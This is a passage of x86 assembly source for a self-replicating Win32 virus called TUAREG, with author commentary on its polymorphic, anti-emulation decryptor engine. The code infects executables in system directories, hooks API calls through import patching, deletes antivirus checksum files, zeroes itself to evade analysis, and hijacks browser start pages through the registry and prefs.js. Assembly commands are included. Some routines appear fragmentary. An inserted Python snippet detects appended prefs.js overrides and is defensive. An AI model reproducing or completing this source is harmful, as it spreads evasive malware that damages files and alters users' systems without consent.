;; going to take each time) without emulation.
;;
;; - To perform the Branching, the entire engine has been oriented to execute
;; in nearly absolute recursion, simplifying many actions a lot, and taking
;; advantage of this to create very structured portions of code that could be
;; in any program. Not in vain, the size of the decryptors exceeds 8 Kb of
;; pure code most of the time.
;;
;; - The philosophy of this engine is completely different from the
;; MeDriPolEn's. Since I based that one on simulating a corrupted file, this
;; time I simulate a normal application. Every branch has this "format":
;;
;; ------*-------*-------*--------xxxxxxxxxxxxx--<>------() -----|----|---|
;; Legend:
;; -- : Garbage
;; * : Random conditional jump to another branch
;; x : Decryption code (mixed with garbage)
;; <> : Check of end-of-decryption. If it isn't, it performs a random jump
;; to any * on any branch
;; () : Code to jump to the decrypted part, and the code of this branch ends.
;; ----| : Subroutines that are created while coding this branch. The
;; addresses of those subroutines are stored in an array, which allows
;; other branches to call those subroutines apart from their own ones.
;; This type of code is repeated several times and it's randomized a lot.
;;
;; - The garbage is quite complex, to defeat the less advanced emulators. The
;; generator can do CALLs with stack entries and stack frames (emulation of
;; this), nested CALLs, conditional jumps with non-zero displacement, memory
;; reads/writes (performed on .bss when this section exists in the infected
;; file), 8- and 32-bit common types (some 16-bit ones are avoided on purpose,
;; due to some emulators that take them as suspicious in a Win32 app.),
;; random short loops between code, relative jumps to the decrypted code
;; (requires execution/emulation for a correct run of it), calls to imported
;; KERNEL32 functions (it was hard to make it!), etc. etc. etc., and I don't
;; use any of the usual one-byte garbage of poly engines (those CLCs, CMCs,
;; STIs, etc. are highly suspicious for an emulator, so I didn't put any of
;; them, except in the little second decryptor, which is under the main
;; encryption layer).
;;
;; - Before entering the TUAREG engine, the virus scans the victim's body
;; to determine the future virtual address of the import table and the
;; virtual addresses of the import table fields, and it fills the fields in
;; the APIInfo blocks to know which address it has to use to call that
;; KERNEL32 function. Once that is done, the virus will call any of the
;; "controlled" APIs that were also in the import table. I think it's the
;; first virus (November 2000) that makes API calls in the decryptor :). The
;; called APIs are ordered by frequency of appearance in an application, and
;; with a little algorithm we make the first ones be selected more often
;; than the next ones (in descending order).
;;
;; - Some other internal features that "beautify" the code.
;;
;; More about the virus itself
;;-------------------------------
;; - Since it's v1.21, it was coded over version 1.0 (of course), so if
;; some code isn't commented it's because I was too lazy to do it :), and
;; many things have changed from v1.0 (bugs corrected, some things improved,
;; etc.)
;;
;; - The KERNEL32 address is found using the address pushed onto the stack
;; from the beginning. It's easy, it doesn't generate errors (since most
;; Microsoft C compiled programs rely on the fact that that address exists),
;; and it's compatible with all versions of Win32 (I think). Anyway, the
;; virus uses SEH. If any exception occurs during any operation, the virus
;; will restore the old SEH and execute the host.
;;
;; - After finding the RVAs of the API functions, it performs a runtime
;; infection.
;;
;; - After that, the virus patches the import table of the file and sets up
;; its per-process part.
;;
;; - If the API functions couldn't be obtained, the virus will exit.
;; Otherwise, if the WriteProcessMemory or GetCurrentProcess RVA isn't
;; obtained, it will simulate an execution error, since it can't restore
;; the host.
;;
;; - Before returning to the host, it'll try to patch all the occurrences of
;; ExitProcess in the host and make them point to the routine prepared in
;; this virus to handle it (that's what I call "Pseudo-EPO" :). When the
;; application calls ExitProcess, the virus takes control, and since the
;; program is, from the user's point of view, terminated, we can perform
;; intensive virus activity as a background action. What we do here is infect
;; all programs, not only one in four, with runtime infection, and then we
;; overwrite all the virus code with zeroes to prevent AVers from getting a
;; clean copy of the virus in memory when executing it in a simulated
;; environment and waiting for the end of the run.
;;
;; - In this version, the virus is very stable, and an average user won't
;; notice the presence of the virus through errors in the system, since even
;; the TUAREG (the most complex code I ever made) hasn't any errors now (as
;; far as I know), nor has the infection system.
;;
;; Payload
;;-----------
;; On the first and third Friday of every month, the start pages of the two
;; most used browsers (Internet Explorer and Netscape Communicator) will be
;; set to http://www.thehungersite.com, which is a site that donates food to
;; hungry countries, bought with the money they earn when you visit the
;; banners. The virus sets this using the ADVAPI32.DLL registry functions.
;;
;; With this, I could say that maybe it's the first payload in virus history
;; that does something useful and maybe changes some minds about the state
;; of our world. Hey, and you can do it too! Go to that URL
;; (http://www.thehungersite.com) and press "Donate food". It's easy, free and
;; can save lives!
;;
;; About this, I saw some time ago in alt.comp.virus (Usenet) a discussion
;; about this virus. A guy asked if this virus could be called a good virus or
;; what (due to the payload), and it generated a good discussion about the
;; ethics of virus writing to do this type of thing. Well, I did it because I
;; wanted to make a payload that did something more than fuck the user. And
;; it's far from my intention to defame the URL I redirect browsers to, but
;; it's the most famous and most trustworthy donation service that I have
;; seen on the internet, and moreover this page has links to other free
;; donation services. I don't care about those who think their start page is
;; "holy" and nobody must touch it (the ones that think that their own home
;; comfort is above anyone's life - get a life!), but I care about the ones
;; that think the action is good but the way is bad (a virus). My apologies,
;; but you have to think that a virus is a piece of code, not a fragment of
;; The Apocalypse :).
;;
;; My thanks to:
;;---------------
;;
;; The whole 29A - members and ex-members, because it's the Dream Team of
;; the vx!
;; All ppl who innovate and create in this scene, and don't destroy the work
;; of anyone (I HATE destructive payloads! :)
;; To you, for reading this
;; To assemble this:
;; TASM32 /m29A /ml tuareg.asm
;; TLINK32 -aa -Tpe -x tuareg.obj,,,import32.lib
;; PEWRSEC tuareg.exe
.386p
.model flat
locals
.data
;; Message on first generation
Titulo db 'Virus TUAREG v1.21 1st Generation by The Mental Driller/29A',0
Mensaje db 'You have been infected with the first generation',0dh,0ah
db 'of the virus TUAREG by The Mental Driller/29A',0
.code
extrn ExitProcess:PROC ; For the fake host
extrn MessageBoxA:PROC
TuaregMain proc
Inic_Virus label dword
;; This decryptor will be generated later. It's a fully polymorphic one,
;; although very simple, to avoid cryptanalysis. The structure is as follows:
;;
;; MOV Reg,InicDecryptVirus
;; MOV Reg2,Virus_Size / 4
;; MOV Reg3,CryptKey
;; Loop:
;; XOR/ADD/SUB [Reg],Reg3
;; ADD Reg,4
;; ADD/SUB/XOR/ROL1 Reg3,Modifier
;; DEC Reg2
;; JNZ Loop
;;
;; The MOVs can be MOVs, LEAs or PUSH/POP pairs, and it can use DEC or SUB,1
;; or ADD,-1 , randomly selected. Well, quite a bit better than v1.0 (which
;; was a fixed decryptor where I only changed values).
db 3Ch dup (90h)
InicDecryptVirus:
cld ; Restore possible STD
push eax
call GetDeltaOffset
GetDeltaOffset: pop ebp
sub ebp, offset GetDeltaOffset
mov [ebp+DeltaOffset2], ebp ; This is needed!
mov [ebp+DeltaOffset3], ebp
mov [ebp+DeltaOffset4], ebp
mov [ebp+DeltaOffset5], ebp
db 0Fh, 31h ; rdtsc ; Get CPU timestamp
mov [ebp+DwordAleatorio1], eax ; Set EAX (low timestamp)
; on random seed
;; Put the return address
mov eax, [ebp+InicIP]
mov [esp], eax
mov eax, [ebp+RestoreAddress]
mov [ebp+RestoreAddress2], eax
mov eax, [ebp+SizeOfText]
mov [ebp+SizeOfText2], eax
mov eax, [ebp+ImageBase]
mov [ebp+ImageBase2], eax
;; SEH frame
lea eax, [ebp+@@JumpToHost]
push eax
push dword ptr fs:[0]
mov fs:[0], esp
mov [ebp+LastStack], esp ; For SEH returning
;; This code, in fact, will jump to the host execution, since it's set as our
;; SEH handler. So, a jump here will execute the host. Quite anti-debugger :)
@@GenerateException:
xor ebx, ebx
dec ebx
mov [ebx], cl
@@MaybeKernelFound:
mov ebx, [eax+3Ch] ; Get PE address
add ebx, eax
cmp word ptr [ebx], 'EP' ; Is it a PE header?
jnz @@Loop_001 ; If not, continue searching
;; SEH handler. This is the SEH that we put. If any exception happens, this
;; will take control and it'll restore and execute directly the host.
@@JumpToHost: db 0BDh
DeltaOffset3 dd 0 ; This is MOV EBP,DeltaOffset
mov esp, [ebp+LastStack] ; Recover ESP
pop dword ptr fs:[0] ; Restore SEH
pop eax ; Release our handle from stack
; This has been changed since the binary release. I noticed it had
; a bug, so I corrected it. The binary that the AVers have differs
; a little from this.
@@SimulateExecError:
push 00BFF700h ; Construct NOP/MOV BYTE PTR [BFF70000],0
push 0005C690h ; in the stack frame to generate an excep-
jmp esp ; tion from an "unknown module" :)
TuaregMain endp
AuxCounter dd 0
LastStack dd 0
InfectAllFiles db 0
;; Now the ident message. Never shown, but it'll help the AVers to name this
;; virus ;)
Ident_Virus db 0,0,'[Virus TUAREG v1.21 by The Mental Driller/29A]',0
db '- This virus has been designed for carrying '
db 'the TUAREG engine -',0,0
;; This function scans for any occurrence of ExitProcess in the .text section
;; and substitutes the address in the call with an address here. Once here,
;; we move a little program to the stack frame and then we jump there. That
;; program will overwrite the virus code with zeroes. This feature can fuck
;; some AVers' programs that get a decrypted copy of the virus by executing
;; the infected program and waiting for it to finish.
ModifyExitProcess proc
cmp dword ptr [ebp+ExitProcessInImport], 0
jz @@Return ; If ExitProcess doesn't exist in the
; import directory, finish
lea ebx, [ebp+AddressToLastFunc] ;Get the address to over-
lea eax, [ebp+LastFunction] ; write ExitProcess callings
mov [ebx], eax ; with, pointing to our routi-
; ne
mov [ebp+AddressToAddressToLastFunc], ebx
mov esi, [ebp+RestoreAddress2] ; beginning of .text
mov ecx, [ebp+SizeOfText2] ; Quantity of code to scan
sub ecx, 6 ; Last 5 bytes can't contain a call, and maybe
; we generate an exception if we overpass .text
; size
@@Loop_001: lea edi, [ebp+CallToSearch] ; Address to constructed call
mov edx, 6 ; Size of call
@@Loop_002: cmpsb ; Test byte
jnz @@NextByte ; If it isn't equal, jump
@@Loop_003: dec edx ; Decrease call-size counter
jz @@Found ; If 0, we've found a call to ExitProcess
cmp edx, 5 ; Call-size counter=5?
jnz @@Next_001 ; If not, check normally
dec ecx ; Decrease .text-size counter
jz @@Return ; If it's 0, return
inc esi ; Increase checking indexes
inc edi ; ...And now check two possible opcodes:
cmp byte ptr [esi-1], 15h ; CALL [Address]
jz @@Loop_003 ; If it is, continue checking
cmp byte ptr [esi-1], 25h ; JMP [Address]
jnz @@NextByte ; If it isn't, "restart" call string
jmp @@Loop_003 ; Check next byte (now normally)
@@Next_001: dec ecx ; End of .text?
jnz @@Loop_002 ; If not, continue checking that call
jmp @@Return ; If yes, end
@@NextByte: dec ecx ; End of .text?
jnz @@Loop_001 ; If not, continue checking for calls
jmp @@Return ; If yes, end
@@Found: dec ecx ; Decrease ecx (not decreased before)
pushad ; Save regs
push 0
push 4 ; Write 4 bytes (overwrite address reference)
lea ebx, [ebp+AddressToAddressToLastFunc]
push ebx ; Thing to write (the dword in this variable)
lea ebx, [esi-4]
push ebx ; Place to overwrite (the address in the found
; call)
call dword ptr [ebp+RVA_GetCurrentProcess]
push eax ; Write on the current process
call dword ptr [ebp+RVA_WriteProcessMemory] ; Overwrite!
popad ; Restore registers values
jmp @@Loop_001 ; Continue looking for calls to ExitProcess
@@Return: ret ; Return
ModifyExitProcess endp
;; This function is the one that we make ExitProcess point to. Well, we
;; make the calls to ExitProcess point here, so they aren't calls to
;; ExitProcess anymore, but here... bah, more or less :). The fact is that if
;; we patched the calls to ExitProcess correctly, this function will be called
;; when you close the application (alt-F4, or Close in its menu, etc. etc.),
;; and here we can do lots of things without being noticed by the user as
;; easily as if we did them at the beginning, because s/he closed the applica-
;; tion and the desktop was restored, seeming a complete exit, but this
;; virus is still alive! When we arrive here, we infect ALL files, since we
;; don't have to do things quickly (and you can think: then, why don't you
;; wait for this function to do everything and make things more unnoticeable?
;; Because if ExitProcess patching fails, at least the virus has been spread a
;; bit ;). Before the massive infection, we complete a little overwriting rou-
;; tine and we copy it to the stack frame. After infection, we jump there, and
;; that routine will overwrite the whole virus body with 0s to avoid getting a
;; clean copy of the virus when the application ends (AVers use that technique
;; quite a lot). If I had made the virus without per-process residency, I could
;; do it before jumping to the restored host, but well...
LastFunction proc
pop eax
lea edi, [esp-1800h] ; Copy the routine to the stack (qui-
; te far up, to avoid overwriting)
db 0BDh ; MOV EBP,xxx
DeltaOffset4 dd 0 ; EBP=DeltaOffset
mov [ebp+ExitCode], eax
mov esp, [ebp+LastStack] ; Get the saved stack address
add esp, 0Ch ; Eliminate some things of B4
mov eax, [ebp+RVA_ExitProcess] ; Get the address to there
mov [ebp+ExitProcessAddr], eax ; Complete the instruction
mov [ebp+SetValueToEDI], edi ; Set the jumping value
lea esi, [ebp+ZeroingFunction] ; ESI=Address to function
lea eax, [ebp+Inic_Virus] ; EAX=Beginning of the virus
mov [ebp+InicAddressFor0], eax ; Complete instruction
mov ecx, offset ZeroingFunctionEnd-offset ZeroingFunction
cld ; ECX=Size of zeroing routine
rep movsb ; Copy routine
mov byte ptr [ebp+InfectAllFiles], 1 ; Now infect all fi-
; les on current, windows and system
; directories, instead of one of each four
;; SEH frame
lea eax, [ebp+@@JumpToFinish]
push eax
push dword ptr fs:[0]
mov fs:[0], esp
mov [ebp+LastStack], esp ; For SEH returning
call RuntimeInfection
@@JumpToFinish:
@@JumpToHost: db 0BDh
DeltaOffset5 dd 0 ; This is MOV EBP,DeltaOffset
mov esp, [ebp+LastStack] ; Recover ESP
pop dword ptr fs:[0] ; Restore SEH
pop eax ; Release our handle from stack
push dword ptr [ebp+ExitCode]
db 0BFh
SetValueToEDI dd 0 ; Get the address to jump to overwrite this code
jmp edi ; Jump there
LastFunction endp
ExitCode dd 0
;; This function, after being completed, is the one that we copy to the stack
;; frame to jump and overwrite the code of this virus. After overwriting it,
;; we call to ExitProcess and finish the activity
ZeroingFunction proc
mov edi, 12345678h ; EDI=Beginning address of virus
org $-4
InicAddressFor0 dd 0
xor eax, eax ; EAX=6726D43Ah :P
mov ecx, Virus_SizePOW2 / 4 ; ECX=Virtual size in dwords
rep stosd ; Overwrite!
mov eax, 12345678h ; Before, we put here the address to
org $-4 ; ExitProcess
ExitProcessAddr dd 0
; push 0 ; Push ExitProcess return value
; It's set from before!
call eax ; Return
ZeroingFunction endp
ZeroingFunctionEnd label dword
; NOTE: When I was commenting this code (now, for me :), I realized that an
; infected application will always return 0 as errorlevel on ExitProcess,
; because I push a 0 before calling ExitProcess. The correct way of doing this
; would be to get the value from the stack and push it now, since it comes from
; a call to ExitProcess that we patched. I realized this "bug" after sending
; the final version to AVers, so I didn't correct it on this source. Now it's
; corrected.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; PAYLOAD ;;
;; ;;
;; On the first and third Friday of the month, the start pages of Netscape ;;
;; and Internet Explorer are changed to "http://www.thehungersite.com". ;;
;; The first really useful payload in the viruscene history! (Well, I dunno ;;
;; if it is the first, but I like to think it :) ;;
;; ;;
;; It's not as easy as it could seem! ;;
;; Internet Explorer --> We modify the registry entry where the start page ;;
;; is specified ;;
;; Netscape --> We get the directories of all the users via the registry ;;
;; and add a line to the file PREFS.JS setting a new start ;;
;; page ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Payload proc
lea eax, [ebp+SystemTime]
push eax
call dword ptr [ebp+RVA_GetSystemTime] ; Get date and time
cmp word ptr [ebp+DayOfWeek], 5 ; Friday?
jnz @@EndOfPayload ; If not, end
cmp word ptr [ebp+Day], 7 ; First week of the month?
jbe @@DoPayload ; If not, end
cmp word ptr [ebp+Day], 14 ; Second week discarded
jbe @@EndOfPayload
cmp word ptr [ebp+Day], 21 ; Third week of the month?
ja @@EndOfPayload ; If not, end
@@DoPayload:
; We load ADVAPI32.DLL. It's normally loaded, but in this way we'll get
; the module handle, and just in case if it's not loaded.
call LoadRegistryFunctions
or eax, eax
jz @@EndOfPayload
HandleADVAPI32 dd 0
org HandleADVAPI32
HandleOpenedKey dd 0
RVA_RegistryFunctions label dword
RVA_RegOpenKeyExA dd 0
RVA_RegCloseKey dd 0
RVA_RegSetValueExA dd 0
RVA_RegEnumKeyA dd 0
RVA_RegQueryValueExA dd 0
RVA_RegEnumValueA dd 0
;; This function modifies the start page of Internet Explorer. The easiest
;; one, not as complicated to get as the Netscape one.
ModifyInternetExplorer proc
lea eax, [ebp+HandleOpenedKey]
push eax
push KEY_ALL_ACCESS
push 0
lea eax, [ebp+IExplorerKey]
push eax
push HKEY_CURRENT_USER
call dword ptr [ebp+RVA_RegOpenKeyExA]
; This just opened:
; HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
or eax, eax ; Error?
jnz @@End ; End if error
;; This is the path into the registry to set the page to. I don't think this
;; key will change in the future, since many programs use it to set its own
;; start page.
IExplorerKey db 'Software\Microsoft\Internet Explorer\Main',0
IExplorerValue db 'Start Page',0
;; The difficult one. Well, it's not difficult when you see it done, but it's
;; complicated to get. Since there isn't any registry key to set the start
;; page, I had to search the autoconfig (PREFS.JS) and invent a way of
;; modifying it without many problems. I tried to map that file and move the
;; whole text after the java function that sets the start page, to make a hole
;; big enough to set the function (if the old start page were bigger, you can
;; fill with spaces), but that was a pain in the ass. Then, after a good men-
;; tal exercise :), I tried the trick I use now. Since the file is a java file
;; setting values, if you add a line at the end setting a new value, you over-
;; write the last value. It's like doing MOV AX,1234 and later MOV AX,2345 (or
;; the C equivalent).
ModifyNetscapeNavigator proc
; This variable is used for RegEnumKeyA
mov dword ptr [ebp+SubkeyIndex], 0
@@LoopOpeningSubkeys:
mov byte ptr [ebp+NetscapeKeyEnd-1], 0 ; Put this to 0
lea eax, [ebp+HandleOpenedKey]
push eax
push KEY_ALL_ACCESS
push 0
lea eax, [ebp+NetscapeKey]
push eax
push HKEY_LOCAL_MACHINE
call dword ptr [ebp+RVA_RegOpenKeyExA]
; Here, we opened the key:
; HKEY_LOCAL_MACHINE\Software\Netscape\Netscape Navigator\Users'
; We get the subkeys in the recently opened key. That are the users
; registered on the Netscape Navigator. It's like making FindFirstFile
; and FindNextFile in a directory, but easier, since we use an index
; to get the relative key.
push 80h
lea eax, [ebp+ReceivingBuffer]
push eax
push dword ptr [ebp+SubkeyIndex]
push dword ptr [ebp+HandleOpenedKey]
call dword ptr [ebp+RVA_RegEnumKeyA]
or eax, eax ; Error getting subkey?
jnz @@EndOfKeys ; If error, exit
SubkeyIndex dd 0
LongBuffer dd 0
LongBuffer2 dd 0
LineToAddToPrefs db 'user_pref("browser.startup.homepage", "http://www.thehungersite.com");',0dh,0ah
SizeLineToAdd equ $ - offset LineToAddToPrefs
NetscapePrefsFile db '\prefs.js',0
SizeNamePrefs equ $ - offset NetscapePrefsFile
push 0
push 0
push 3
push 0
push 0
push 0c0000000h
lea eax, [ebp+ReceivingBuffer]
push eax
call dword ptr [ebp+RVA_CreateFileA] ; Open PREFS.JS
inc eax
jz @@End ; If error, exit
dec eax
mov [ebp+FileHandle], eax
push 2 ;Relative pointer position (same as INT 21h/AH=42h!)
push 0
push 0
push eax
call dword ptr [ebp+RVA_SetFilePointer] ; Put the file
; pointer at the end
inc eax
jz @@Close ; If error, exit
dec eax
push 0
lea eax, [ebp+LongBuffer]
push eax
push SizeLineToAdd
lea eax, [ebp+LineToAddToPrefs]
push eax
push dword ptr [ebp+FileHandle]
call dword ptr [ebp+RVA_WriteFile] ; Write the line at the
; end of the file
@@Close: push dword ptr [ebp+FileHandle]
call dword ptr [ebp+RVA_CloseHandle] ; Close file handle
@@End: ret ; Return
ModifyPrefs endp
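An added defender-side check, not part of this virus source: it evaluates a prefs.js the way the browser does ("last assignment wins", the trick described above) and reports any preference that is assigned twice, which is the footprint a line appended to the end of the file leaves. The sample file, its line contents and the key names other than browser.startup.homepage are constructed for this example.

```python
import re

# One Netscape/Mozilla preference assignment, e.g.
#   user_pref("browser.startup.homepage", "http://example.invalid/");
PREF_RE = re.compile(r'^\s*user_pref\(\s*"([^"]+)"\s*,\s*(.*?)\s*\);\s*$')

HOMEPAGE_KEY = "browser.startup.homepage"


def parse_prefs(text):
    """Return [(line_no, key, raw_value)] for every user_pref() line, in file order."""
    found = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = PREF_RE.match(line)
        if m:
            found.append((line_no, m.group(1), m.group(2)))
    return found


def effective_prefs(text):
    """Evaluate the file as the browser does: a later assignment replaces an earlier one."""
    effective = {}
    for _, key, value in parse_prefs(text):
        effective[key] = value
    return effective


def find_overrides(text):
    """Keys assigned more than once -> list of (line_no, raw_value) in file order.
    A key that normally appears exactly once (such as the home page) showing up
    twice, with the second copy at the end, is what an appended line looks like."""
    seen = {}
    for line_no, key, value in parse_prefs(text):
        seen.setdefault(key, []).append((line_no, value))
    return {k: v for k, v in seen.items() if len(v) > 1}


def homepage_override(text):
    """Return (first_value, final_value, final_line_no) when the home page is
    re-set later in the file, or None when it is assigned at most once."""
    hits = find_overrides(text).get(HOMEPAGE_KEY)
    if not hits:
        return None
    return hits[0][1], hits[-1][1], hits[-1][0]


# Constructed sample: an ordinary prefs.js with one line appended at the end
# (CRLF-terminated, as a writer emitting 0Dh,0Ah after the line would leave it).
SAMPLE_PREFS = (
    '// Netscape User Preferences File (constructed sample)\n'
    'user_pref("browser.startup.homepage", "http://home.example.test/");\n'
    'user_pref("mail.identity.useremail", "user@example.test");\n'
    'user_pref("browser.startup.homepage", "http://www.thehungersite.com");\r\n'
)

if __name__ == "__main__":
    for key, hits in find_overrides(SAMPLE_PREFS).items():
        print(key, "assigned", len(hits), "times; effective value:",
              effective_prefs(SAMPLE_PREFS)[key])
```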
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
;; PER-PROCESS RESIDENCY: SETTING AND INFECTION
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ImageBase dd 400000h
PatchImportDirectory proc
db 0B8h ; MOV EAX,xxxxxxxx
ImageBase2 dd 400000h ; Image base, set on infection time
mov ebx, [eax+3Ch]
add ebx, eax
cmp word ptr [ebx], 'EP' ; Check if PE header
jnz @@End ; If not, end
mov ecx, [ebx+84h] ; ECX=Size of import data
mov ebx, [ebx+80h]
add ebx, eax ; EBX=RVA of import directory header
@@SearchModule: mov esi, [ebx+0Ch]
or esi, esi
jz @@End
add esi, eax ; ESI=RVA to the module name
@@ToLowerCase: mov edx, [esi] ; Get the first four characters
call ToLower
cmp edx, 'nrek' ; Is it 'kern'?
jnz @@NextModule ; If not, it's not kernel32
mov edx, [esi+4] ; Get next 4 chars
call ToLower
cmp edx, '23le' ; 'el32'?
jz @@Found ; If it is, we've found KERNEL32
@@NextModule: add ebx, 14h ; Next module in import directory
sub ecx, 14h ; Have we finished?
jnz @@SearchModule ; If not, scan next module
jmp @@End ; Finish if we arrived to the end
@@Found: mov esi, [ebx+10h] ; Get the RVA to the array of imported
add esi, eax ; functions in ESI
cld
pushad
mov dword ptr [ebp+DwordToWrite], eax
push 0
push 4
lea eax, [ebp+DwordToWrite]
push eax
lea eax, [esi-4]
push eax
call dword ptr [ebp+RVA_GetCurrentProcess]
push eax
call dword ptr [ebp+RVA_WriteProcessMemory]
; mov [esi-4], eax
jmp @@Loop_001 ; Next function in the import array
@@End: ret
PatchImportDirectory endp
DwordToWrite dd 0
;,,,,,,,,,,,,,,,,,,,,,,,,,
;; PER-PROCESS FUNCTIONS ;
;'''''''''''''''''''''''''
GetDelta proc
mov eax, 12345678h ; This is set on run-time, at the
org $-4 ; beginning. It's shorter than making
DeltaOffset2 dd 0 ; a CALL/POP/SUB in every function
ret
GetDelta endp
; GetProcAddress: Patching this we ensure that the host receives our function
; address rather than the KERNEL32 one. In this way, if
; GetProcAddress is used over one of the patched functions to
; call that address directly, it'll call our function first.
My_GetProcAddress proc
call GetDelta ; EAX=Delta offset
push ecx ; Save ECX
add eax, offset @@ReturnHere ; Calculate return
; address
mov ecx, eax ; Put it on ECX...
xchg eax, [esp+4] ; ...and substitute the return
; into the stack by ours.
mov [ecx+1], eax ; Save the real return address
; in [ReturnGetProcAddress]
pop ecx ; Restore ECX
call GetDelta ; Get delta in EAX...
mov eax, [eax+RVA_GetProcAddress] ; and jump to
jmp eax ; GetProcAddress, but return...
; ...here!
@@ReturnHere: db 68h
ReturnGetProcAddress dd 0 ; Push return to host (set before)
or eax, eax ; EAX=0?
jz @@Return ; Error, so return
pushad ; Save all
push eax ; Save function address
call GetDelta
xchg ebp, eax ; EBP=Delta offset
pop eax ; Restore function address
lea esi, [ebp+RVA_GetProcAddress]
; ESI=Begin address of functions
lea edi, [ebp+RVA_GetProcAddress+10h*4]
; EDI=End address of functions
mov ebx, esi
xchg ecx, eax
@@Loop_GPA: lodsd ; Load first RVA
cmp eax, ecx ; Compare the kernel returned RVA
; with the RVA that we got scanning
; the kernel at first
jnz @@Next_GPA ; If it isn't equal, jump
sub esi, ebx ; Put in ESI the address of the per-
add esi, ebp ; process function
mov eax, [esi+FunctionsAddress+4] ; Load it
mov [esp+1Ch], eax ; Substitute RVA to function
; by our function address
jmp @@Return2 ; End
@@Next_GPA: cmp esi, edi ; Already at the end of the array?
jnz @@Loop_GPA ; If not, loop
@@Return2: popad ; Restore registers
@@Return: ret ;Return to host with the substituted RVA (if done)
My_GetProcAddress endp
InfectByPerProcess proc
push eax ; Save RVA to function
pushad
call GetDelta
xchg ebp, eax ; EBP=Delta offset
mov ebx, [esp+28h] ; EBX=RVA to the name of the
; file to operate
InfectThisPath: lea eax, [ebp+FindFileField] ; EAX=RVA to data
; storage
push eax ; Store it to use FindFirstFile
push ebx ; Store the RVA to the name of the file
call dword ptr [ebp+RVA_FindFirstFileA] ; Find it
inc eax
jz @@Return ; If error (not found), return
dec eax
mov esi, ebx
lea edi, [ebp+FileName]
cld
@@LoopCopy:
movsb
cmp byte ptr [edi-1], 0
jnz @@LoopCopy
InfectDirectly proc
pushad
jmp InfectThisPath
InfectDirectly endp
My_FindFirstFileA proc
call GetDelta ; EAX=Delta offset
mov byte ptr [eax+FindFirstIdent], 1
Common_FindFile: add eax, offset @@ReturnHere ; EAX=Return address
; for calling the KERNEL32 function
; and returning here and not to the
; host
push ecx ; Save ECX
mov ecx, eax ; ECX=Return address
xchg eax, [esp+4] ; Set it onto stack and EAX is
; now the return address to the
; host
mov [ecx+1], eax ; Save it in @@ReturnHere+1
mov eax, [esp+0Ch] ; We put the buffer address...
mov [ecx+0Dh], eax ; ...here
pop ecx ; We restore ECX
call GetDelta ; EAX = Delta offset
cmp byte ptr [eax+FindFirstIdent], 1
jz @@PutFindFirst ; If =1, call to FindFirstFileA
@@PutFindNext: mov eax, [eax+RVA_FindNextFileA]
jmp eax ; Call FindNextFileA
@@PutFindFirst: mov eax, [eax+RVA_FindFirstFileA]
jmp eax ; Call FindFirstFileA
@@ReturnHere: db 68h ; PUSH Value
dd 0 ; +1
pushad ; +5 ; Save registers
inc eax ; +6 ; Error?
jnz @@ItsOK ; +7 ; If not, jump
dec eax ; +9 ; Restore EAX
jmp @@Return ; +A ; Return to host
@@ItsOK: db 0BEh ; MOV ESI,Value ; +C ; ESI=Address to
@@ESIValue: dd 0 ; +D ; data field
call GetDelta
xchg ebp, eax ; EBP=Delta offset
lea edi, [ebp+FindFileField] ; EDI=Our data field
mov ecx, FindFileFieldSize ; Copy the data retrie-
cld ; ved by the function to our
rep movsb ; data field
dec byte ptr [ebp+InfectFileNow] ; Decrease infec-
; tion counter
jnz @@Return ; If it's not 0, don't infect
mov byte ptr [ebp+InfectFileNow], 3 ; Set this to
; 3, to infect only one of
; every three files listed by
; this function
call InfectFile ; Infect file
@@Return: popad
ret ; Restore regs and return
My_FindFirstFileA endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
;;; RUN-TIME INFECTION
;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; This will infect one file of each four in the current, windows and system
;; directory (as always). If the files AVP.CRC, ANTI-VIR.DAT, CHKLIST.MS or
;; IVB.NTZ are found, they'll be deleted.
RuntimeInfection proc
call LoadSFCFunctions ; Load SFC.DLL library
call LoadIMAGEHLPFunctions ; Load IMAGEHLP.DLL library
call LoadRegistryFunctions
or eax, eax
jz @@NoRegistry
;;; Directly infect several paths
;;; of installed programs
; HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\
; \WinZip
; HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
mov dword ptr [ebp+SubkeyIndex], 0
@@NextSubkey:
inc dword ptr [ebp+SubkeyIndex]
jmp @@LoopSubkeys
@@EndOfKeys2:
push dword ptr [ebp+HandleOpenedKey]
call dword ptr [ebp+RVA_RegCloseKey]
@@EndOfKeys:
push dword ptr [ebp+HandleADVAPI32]
call dword ptr [ebp+RVA_FreeLibrary]
@@NoRegistry:
call InfectCurrentDir ; Self-explanatory ;)
lea eax, [ebp+Directory2]
push eax
push 80h
call dword ptr [ebp+RVA_GetCurrentDirectoryA] ; Save the
; current directory
call InfectWindowsDir ; Infect the Win dir
call InfectSystemDir ; Infect windows\system dir
lea eax, [ebp+Directory2] ; Restore the current dir
push eax
call dword ptr [ebp+RVA_SetCurrentDirectoryA]
cmp dword ptr [ebp+HandleSFC], 0
jz @@Next1
push dword ptr [ebp+HandleSFC]
call dword ptr [ebp+RVA_FreeLibrary]
@@Next1:
cmp dword ptr [ebp+HandleIMAGEHLP], 0
jz @@Next2
push dword ptr [ebp+HandleIMAGEHLP]
call dword ptr [ebp+RVA_FreeLibrary]
@@Next2:
xor eax, eax
mov dword ptr [ebp+HandleSFC], eax
mov dword ptr [ebp+HandleIMAGEHLP], eax
mov dword ptr [ebp+RVA_CheckSumMappedFile], eax
mov dword ptr [ebp+RVA_SfcIsFileProtected], eax
ret ; Return
RuntimeInfection endp
RunKey db 'Software\Microsoft\Windows\CurrentVersion\Run\'
